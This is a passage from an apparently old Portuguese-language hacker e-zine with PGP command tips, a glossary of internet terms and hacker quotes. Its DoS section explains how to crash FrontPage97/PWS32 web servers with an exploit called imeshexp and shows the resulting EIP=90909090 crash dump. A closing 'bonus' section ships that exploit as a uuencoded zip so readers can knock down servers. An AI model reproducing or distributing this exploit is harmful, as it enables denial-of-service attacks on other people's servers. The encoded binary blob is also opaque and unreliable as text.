       pgp -kd seu_user_id

* Para desabilitar ou reabilitar uma chave publica do seu molho:

       pgp -kd user_id

* Para decriptar uma mensagem, e manter intacta uma eventual  assinatura que
nela exista:

       pgp -d arq_texto_cifrado

* Para criar um certificado de assinatura (de arquivo), destacado do
documento (til para assinar arquivos ZIP por exemplo):

     pgp -sb arq_texto [-u seu_user_id]

* Para destacar um certificado de assinatura de um arquivo assinado:

     pgp -b arq_texto_cifrado


****************************
*6-FRONTPAGE97 DoS (Part 2)*
****************************
DoS Remoto FrontPage97

Programa:FrontPage97
Sistema:Windows95,98

Vou explica como derruba FrontPage97 com imeshexp.exe um xploit
digite imeshexp host port url.Programa imeshexp esta na sesso
bonus.

Exploitano 
imeshexp 127.0.0.1 80 http://127.0.0.1

Depois aparece a famosa tela de erro. Este programa
executou uma operao ilegal e ser fechado.
 
VHTTPD32 causou uma falha de pgina invlida no
mdulo <desconhecido> em 0000:90909090.
Registradores:
EAX=00000000 CS=014f EIP=90909090 EFLGS=00010206
EBX=000009b8 SS=0157 ESP=0169569c EBP=90909090
ECX=006d2750 DS=0157 ESI=01695729 FS=13e7
EDX=00000090 ES=0157 EDI=00419ed5 GS=0000
Bytes em CS:EIP:

Esvaziamento da pilha:
90909090 90909090 90909090
90909090 90909090 90909090 
90909090 90909090 22909090 
30303420 00202d20 9eb79a8c 
9a939b91 8b91b6ff 9a918d9a 
9a8fb08b 


**************************
*8-DICIONRIO DA INTERNET*
**************************

Apache: O mais popular servidor Web (servidor HTTP), independente e 
em sistema modular, com riqueza de recursos, desempenho,portabilidade 
e funcionalidade.

Applets:Denominao dada a programas controladores de dispositivos
e tambm a pequenos programas utilitrios executveis pelos navegadores 
ou pelas interfaces grficas,representados por cones.

ARP: Address Resolution Protocol - protocolo do TCP/IP (ver) que 
relaciona endereos IP a endereos do nvel de enlace de uma rede na Internet; 
utilizado para converso de endereo fsico em endereo lgico.

Correio Eletrnico: Eleronic Mail - sistema de troca de mensagens 
entre computadores(mensagens,programas,imagens,sons); o servio bsico 
de comunicao em redes de computadores.Funciona geralmente como 
caixas-postais de uso assinantes,em rede que administra essa troca de 
mensagens; permite que os usurios da rede troquem mensagens usando 
um endereo eletrnico como referncia para localizao de destinatrio.

Endereo IP: Endereos IP so o mtodo pelo qual computadores 
(ou mais exatamente as interfaces de rede dos equipamentos) 
so identificados em uma rede TCP/IP.Todos os endereos IP consistem
de quatro nmeros,cada um variando de 0 a 255, separados por
pontos. Ex: 192.134.255.12

Firewall: "parede de fogo" ou "parede corta-fogo" - barreira de segurana 
(na Internet) que isola partes da rede. Designativo de sistemas de 
segurana(combinao de programas e equipamentos)criados para proteo 
de mensagens e transaes, implementados atravs de filtragem da 
criptografia dos dados em programa de servios pela Internet,
incluindo variados tipos de controle por software ou hardware.

FTP: Um acrnimo para Protocolo de Transferncia de Arquivos. 
 tambm o nome do programa que permite a cpia de arquivos de 
um sistema de arquivos para outro.

Gateway: Protal,porta de entrada, meio de acesso, ponte, meio de 
ligao,passagem, conexo.Alguma coisa que serve como  entrada ou meio
de acesso.Dispositivo ou programa que passa informao entre redes que 
normalmente no podem se comunicar.

Hipertexto: Qualquer texto que contenha links para outros 
textos ou outros documentos;o sistema que interconecta documentos.

Html: HyperText Markup Language - Linguagem de Marcao de 
Hipertextos - linguagem para criao de "pginas" - 
documentos em hipertexto(linguuagem de marcao de pgina padro)
,para publicao no World Wide Web.

Linus Torvalds: Criador do Linux em 1991,enquanto era 
um estudante universitrio.

Linux: Um robusto e funcional sistema operecional, 
de livre distribuio, cujo kernel foi desenvolvido por Linus Trovalds.

LILO: Um carregador de sistema operacionais para sistemas 
Linux em plataformas Intel e compatveis.

Root: O nome de acesso da conta que tem total e 
completo acesso aos recursos do sistema.Tambm usando,na forma inglesa,
para identificar,o diretrio / ou diretrio raiz.

Shell: Interpretador de Comandos. Interface entre o usurio
e o sistema operacional que interpreta comandos e interage 
com o usurio.

TCP/IP: Um acrnimo para Protocolo de Controle de Transmisso/Protocolo 
Internet,TCP/IP  o nome dado ao padro de rede comumente 
utilizado na Internet atualmente.

Smtp: Simple Mail Transfer Protocol - protocolo simples de transferencia 
de correspondncia - usado na transferncia de correio eletrnico 
(e-mail).Para utilizar o correio eletrnico na rede  necessrio 
que se esteja  conectado a um servidor SMTP.

Unix: Sistema operacional baseado no padro POSIX,que foi criado
na dcada de 70, para computadores de grande porte, e 
 um sistema multitarefa e multiusurio.

DNS: Domain Server or Domain Name System. Converte um endereo 
como http://www.asa.pt num numero IP(Protocolo da Internet)
como 151.134.67.78

IRC: Internet Relay Chat. Um sistema de conversao para 
multi-utilizadores. a funo da Net que que te permite manter 
conversas textuais "ao vivo" com outras pessoas no mesmo
"canal".

Ping: Ping  um programa da Internet que te permite verificar 
se existe um determinado endereo Internet e que pode
aceitar pedidos.

***********
*10-FRASES*
***********

Um sistema soh eh inseguro quando eh mal configurado.
                   (Phiber Optik) 

"Nao cometam os mesmos erros que cometi.
 Esse negocio de ser hacker pode parecer
excitante no principio, mas depois, quando
 voce avalia o que fez, se lembra que so tem
           uma vida para viver"
           - Kevin Mitnick

**********
*11-BONUS*
**********
Como disse la em cima, aqui esta o imeshexp para voc derrubar algums servidores PWS32
www 80 no ruwindows.

_=_ 
_=_ Part 001 of 001 of file imeshexp.zip
_=_ 

begin 666 imeshexp.zip
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
